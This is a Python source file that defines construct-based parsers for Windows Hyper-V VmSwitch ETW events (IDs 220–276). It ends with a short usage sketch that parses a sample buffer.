"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"RoutingDomainCount" / Int32ul,
"MultiTenantStackEnabled" / Int8ul,
"Status" / Int32ul,
"Ext1" / Int32ul,
"Ext2" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=220, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_220_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicStatus" / Int32ul,
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=221, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_221_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ObjectState" / Int32ul,
"NicState" / Int32ul,
"NicPaused" / Int8ul,
"BuffersNotReady" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=222, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_222_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ObjectState" / Int32ul,
"NicState" / Int32ul,
"NicPaused" / Int8ul,
"BuffersNotReady" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=223, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_223_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=224, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_224_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=225, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_225_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul,
"Status" / Int32ul,
"Flags" / Int32ul,
"BaseCpuNumber" / Int32ul,
"HashInformation" / Int32ul,
"IndirectionTableSize" / Int32ul,
"IndirectionTableOffset" / Int32ul,
"HashSecretKeySize" / Int32ul,
"HashSecretKeyOffset" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=226, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_226_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"BaseCpuNumber" / Int32ul,
"HashInformation" / Int32ul,
"IndirectionTableSize" / Int32ul,
"IndirectionTableOffset" / Int32ul,
"HashSecretKeySize" / Int32ul,
"HashSecretKeyOffset" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=227, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_227_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DefaultQueueVrssEnabled" / Int8ul,
"DefaultQueueVmmqEnabled" / Int8ul,
"DefaultQueueVrssMaxQueuePairs" / Int32sl,
"DefaultQueueVrssMinQueuePairs" / Int32sl,
"DefaultQueueVrssQueueSchedulingMode" / Int32ul,
"DefaultQueueVrssExcludePrimaryProcessor" / Int8ul,
"DefaultQueueVrssIndependentHostSpreading" / Int8ul,
"FailReason" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=228, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_228_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DefaultQueueVrssEnabled" / Int8ul,
"DefaultQueueVmmqEnabled" / Int8ul,
"DefaultQueueVrssMaxQueuePairs" / Int32sl,
"DefaultQueueVrssMinQueuePairs" / Int32sl,
"DefaultQueueVrssQueueSchedulingMode" / Int32ul,
"DefaultQueueVrssExcludePrimaryProcessor" / Int8ul,
"DefaultQueueVrssIndependentHostSpreading" / Int8ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=229, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_229_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"MemberAdapterNameLen" / Int32ul,
"MemberAdapterName" / Bytes(lambda this: this.MemberAdapterNameLen),
"MemberAdapterFriendlyNameLen" / Int32ul,
"MemberAdapterFriendlyName" / Bytes(lambda this: this.MemberAdapterFriendlyNameLen),
"NicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=230, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_230_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"NvgreEnabled" / Int8ul,
"VxLanEnabled" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=231, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_231_0(Etw):
pattern = Struct(
"MacAddressLen" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacAddressLen),
"MemberAdapterNameLen" / Int32ul,
"MemberAdapterName" / Bytes(lambda this: this.MemberAdapterNameLen),
"MemberAdapterFriendlyNameLen" / Int32ul,
"MemberAdapterFriendlyName" / Bytes(lambda this: this.MemberAdapterFriendlyNameLen),
"TimeDiff" / Int64sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=232, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_232_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=233, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_233_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=234, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_234_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=235, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_235_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=236, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_236_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=237, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_237_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Reason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=238, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_238_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=239, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_239_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=240, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_240_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"BufferAddress" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=241, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_241_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"BufferAddress" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=242, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_242_0(Etw):
pattern = Struct(
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"DestNicNameLen" / Int32ul,
"DestNicName" / Bytes(lambda this: this.DestNicNameLen),
"DestNicFNameLen" / Int32ul,
"DestNicFName" / Bytes(lambda this: this.DestNicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"BufferAddress" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=243, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_243_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"AvailableAddressFilters" / Int32ul,
"RequestedVlanIDs" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=244, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_244_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"AvailableAddressFilters" / Int32ul,
"RequestedVlanIDs" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=245, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_245_0(Etw):
pattern = Struct(
"FilterId" / Int32ul,
"vPortId" / Int32ul,
"Status" / Int32ul,
"VportsSupported" / Int8ul,
"EmbeddedTeaming" / Int8ul,
"NicIndex" / Int32ul,
"DstVPortId" / Int32ul,
"VlanId" / Int32ul,
"MacLength" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacLength)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=246, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_246_0(Etw):
pattern = Struct(
"FilterId" / Int32ul,
"SrcVPortId" / Int32ul,
"Status" / Int32ul,
"VportsSupported" / Int8ul,
"EmbeddedTeaming" / Int8ul,
"NicIndex" / Int32ul,
"DstVPortId" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=247, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_247_0(Etw):
pattern = Struct(
"FilterId" / Int32ul,
"vPortId" / Int32ul,
"Status" / Int32ul,
"VportsSupported" / Int8ul,
"EmbeddedTeaming" / Int8ul,
"NicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=248, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_248_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=249, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_249_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=250, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_250_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=251, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_251_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=252, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_252_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ProcessorIndex" / Int32ul,
"QueueSizeMBytes" / Int32ul,
"QueueLimitMBytes" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=253, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_253_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ProcessorIndex" / Int32ul,
"QueueSizeMBytes" / Int32ul,
"QueueLimitMBytes" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=254, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_254_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NetEvent" / Int32ul,
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=255, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_255_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"RdmaWeight" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=256, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_256_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"RdmaWeight" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=257, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_257_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"RdmaWeight" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=258, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_258_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=259, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_259_0(Etw):
pattern = Struct(
"NdisOid" / Int32ul,
"OidFailureStatus" / Int32ul,
"FailureMode" / Int32ul,
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=260, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_260_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"RssQueueIndex" / Int16sl,
"NdisStatus" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=261, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_261_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DropLowResourcesPackets" / Int8ul,
"FailReason" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=262, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_262_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DropLowResourcesPackets" / Int8ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=263, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_263_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=264, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_264_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=265, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_265_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=266, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_266_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=267, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_267_0(Etw):
pattern = Struct(
"IoctlCode" / Int32ul,
"ElapsedTime" / Int64ul,
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=268, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_268_0(Etw):
pattern = Struct(
"ConnectivityState" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=269, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_269_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=270, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_270_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=275, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_275_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=276, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_276_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
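# --- Hedged usage sketch (not part of the generated provider definitions) ---
# Every pattern above follows the same construct idiom: a length field such as
# "NicNameLen" / Int32ul immediately followed by a Bytes field whose size is
# resolved from that length at parse time. The guarded block below exercises
# that idiom on a hand-built buffer, reusing the Struct/Int32ul/Bytes names the
# module already imports; the field names and sample bytes are illustrative
# only, and the @declare/Etw registration machinery is deliberately left alone.
if __name__ == "__main__":
    import struct

    example_pattern = Struct(
        "NicNameLen" / Int32ul,
        "NicName" / Bytes(lambda this: this.NicNameLen),
    )
    payload = struct.pack("<I", 4) + b"eth0"  # 4-byte little-endian length prefix
    parsed = example_pattern.parse(payload)
    assert parsed.NicName == b"eth0"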
| 36.268573
| 123
| 0.655327
